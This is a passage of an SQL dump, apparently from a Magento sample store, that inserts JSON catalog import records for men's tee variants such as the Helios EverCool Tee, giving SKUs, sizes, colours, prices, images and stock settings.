r=Black|sku=MS04-XS-Orange,size=XS,color=Orange|sku=MS04-XS-Red,size=XS,color=Red|sku=MS04-S-Black,size=S,color=Black|sku=MS04-S-Orange,size=S,color=Orange|sku=MS04-S-Red,size=S,color=Red|sku=MS04-M-Black,size=M,color=Black|sku=MS04-M-Orange,size=M,color=Orange|sku=MS04-M-Red,size=M,color=Red|sku=MS04-L-Black,size=L,color=Black|sku=MS04-L-Orange,size=L,color=Orange|sku=MS04-L-Red,size=L,color=Red|sku=MS04-XL-Black,size=XL,color=Black|sku=MS04-XL-Orange,size=XL,color=Orange|sku=MS04-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms04-orange_back.jpg\",\"image\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms04-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"Cotton|HeatTec&reg;|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(5, 'catalog_product', 'append', '{\"400\":{\"sku\":\"MS05-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-XS-Black\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"401\":{\"sku\":\"MS05-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-XS-Blue\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms05-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"402\":{\"sku\":\"MS05-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-XS-Purple\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"403\":{\"sku\":\"MS05-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-S-Black\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"404\":{\"sku\":\"MS05-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-S-Blue\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms05-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"405\":{\"sku\":\"MS05-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-S-Purple\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"406\":{\"sku\":\"MS05-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-M-Black\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"407\":{\"sku\":\"MS05-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-M-Blue\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms05-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"408\":{\"sku\":\"MS05-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-M-Purple\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. 